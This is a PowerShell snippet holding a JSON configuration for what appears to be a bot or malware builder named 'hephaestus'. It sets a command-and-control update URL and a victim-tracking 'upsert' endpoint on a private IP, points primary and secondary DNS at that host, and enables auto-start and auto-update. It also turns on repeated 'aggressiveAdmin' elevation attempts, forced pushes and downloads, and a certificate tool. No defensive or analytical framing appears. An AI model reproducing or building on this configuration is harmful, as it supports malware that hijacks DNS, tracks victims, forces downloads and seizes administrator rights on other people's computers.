
$server = @'
{
  "version": "2026.04.03 13:33:47",
  "urlDoc": "",
  "disabled": false,
  "disableVirus": false,
  "serverIp": "192.168.0.92",
  "server": "default",
  "htmlTemplateSponsorFile": "C:\\soft\\hephaestus\\php\\.\\download.html",
  "primaryDns": "192.168.0.92",
  "secondaryDns": "192.168.0.92",
  "extraUpdate": false,
  "updateUrl": "http://192.168.0.92/bot/update",
  "track": true,
  "trackDesktop": false,
  "trackUrl": "http://192.168.0.92/bot/upsert",
  "autoStart": true,
  "autoUpdate": true,
  "aggressiveAdmin": true,
  "aggressiveAdminDelay": 30,
  "aggressiveAdminAttempts": 0,
  "aggressiveAdminTimes": 0,
  "pushesForce": true,
  "pushes": [],
  "startDownloadsForce": true,
  "startDownloads": [],
  "startUrlsForce": false,
  "startUrls": [],
  "frontForce": false,
  "front": [],
  "embeddingsForce": false,
  "embeddings": [],
  "certToolExe": "C:\\soft\\hephaestus\\output\\certtool.exe"
}
'@ | ConvertFrom-Json
